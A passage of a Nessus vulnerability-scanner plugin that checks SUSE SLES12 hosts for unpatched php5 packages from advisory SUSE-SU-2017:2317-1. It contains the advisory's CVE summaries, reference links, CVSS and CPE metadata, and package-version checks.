\"CVE-2017-11145\",\n \"CVE-2017-11146\",\n \"CVE-2017-11147\",\n \"CVE-2017-11628\"\n );\n\n script_name(english:\"SUSE SLES12 Security Update : php5 (SUSE-SU-2017:2317-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for php5 fixes the following issues :\n\n - CVE-2016-10397: parse_url() can be bypassed to return\n fake host. (bsc#1047454)\n\n - CVE-2017-11143: An invalid free in the WDDX\n deserialization of booleanparameters could be used by\n attackers able to inject XML for deserialization tocrash\n the PHP interpreter. (bsc#1048097)\n\n - CVE-2017-11144: The opensslextension PEM sealing code\n did not check the return value of the OpenSSL\n sealingfunction, which could lead to a crash.\n (bsc#1048096)\n\n - CVE-2017-11145: Lack of bounds checks in\n timelib_meridian coud lead to information leak.\n (bsc#1048112)\n\n - CVE-2017-11146: Lack of bounds checks in\n timelib_meridian parse code could lead to information\n leak. (bsc#1048111)\n\n - CVE-2017-11147: The PHAR archive handler could beused by\n attackers supplying malicious archive files to crash the\n PHP interpreteror potentially disclose information.\n (bsc#1048094)\n\n - CVE-2016-5766: Integer Overflow in _gd2GetHeader()\n resulting could lead to heap overflow (bsc#986386)\n\n - CVE-2017-11628: Stack-base dbuffer overflow in\n zend_ini_do_op() in Zend/zend_ini_parser.c (bsc#1050726)\n\n - CVE-2017-7890: Buffer over-read from unitialized data in\n gdImageCreateFromGifCtx function could lead to denial of\n service (bsc#1050241)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1047454\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1048094\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1048096\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1048097\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1048111\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1048112\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1050241\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1050726\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=986386\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-10397/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-5766/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2017-11143/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2017-11144/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2017-11145/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2017-11146/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2017-11147/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2017-11628/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2017-7890/\");\n # https://www.suse.com/support/update/announcement/2017/suse-su-20172317-1/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dfa00ded\");\n script_set_attribute(attribute:\"solution\", value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Software Development Kit 12-SP3:zypper in -t\npatch SUSE-SLE-SDK-12-SP3-2017-1431=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP2:zypper in -t\npatch SUSE-SLE-SDK-12-SP2-2017-1431=1\n\nSUSE Linux Enterprise Module for Web Scripting 12:zypper in -t patch\nSUSE-SLE-Module-Web-Scripting-12-2017-1431=1\n\nTo bring your system up-to-date, use 'zypper patch'.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-11628\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2017-11147\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/08/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-mod_php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-mod_php5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-bcmath-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-bz2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-bz2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-calendar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-calendar-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-ctype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-ctype-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-curl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-dba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-dom\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-dom-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-enchant\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-enchant-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-exif\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-exif-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-fastcgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-fastcgi-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-fileinfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-fileinfo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-fpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-fpm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-ftp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-ftp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-gd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-gettext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-gettext-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-gmp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-iconv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-iconv-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-imap-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-intl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-json-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-ldap-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-mbstring-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-mcrypt-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-mysql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-odbc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-opcache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-opcache-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-openssl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-pcntl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-pcntl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-pdo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-pgsql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-phar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-phar-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-posix\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-posix-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-pspell-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-shmop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-shmop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-snmp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-soap-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-sockets\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-sockets-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-sqlite-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-suhosin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-suhosin-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-sysvmsg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-sysvmsg-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-sysvsem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-sysvsem-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-sysvshm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-sysvshm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-tokenizer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-tokenizer-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-wddx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-wddx-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-xmlreader\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-xmlreader-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-xmlrpc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-xmlwriter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-xmlwriter-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-xsl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-zip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-zip-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-zlib-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"apache2-mod_php5-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"apache2-mod_php5-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-bcmath-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-bcmath-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-bz2-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-bz2-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-calendar-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-calendar-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-ctype-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-ctype-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-curl-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-curl-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-dba-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-dba-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-debugsource-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-dom-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-dom-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-enchant-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-enchant-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-exif-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-exif-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-fastcgi-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-fastcgi-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-fileinfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-fileinfo-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-fpm-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-fpm-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-ftp-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-ftp-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-gd-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-gd-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-gettext-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-gettext-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-gmp-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-gmp-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-iconv-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-iconv-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-imap-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-imap-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-intl-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-intl-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-json-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-json-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-ldap-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-ldap-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-mbstring-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-mbstring-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-mcrypt-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-mcrypt-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-mysql-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-mysql-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-odbc-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-odbc-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-opcache-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-opcache-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-openssl-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-openssl-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-pcntl-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-pcntl-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-pdo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-pdo-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-pgsql-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-pgsql-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-phar-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-phar-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-posix-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-posix-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-pspell-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-pspell-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-shmop-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-shmop-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-snmp-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-snmp-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-soap-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-soap-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-sockets-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-sockets-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-sqlite-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-sqlite-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-suhosin-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-suhosin-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-sysvmsg-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-sysvmsg-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-sysvsem-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-sysvsem-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-sysvshm-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-sysvshm-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-tokenizer-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-tokenizer-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-wddx-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", 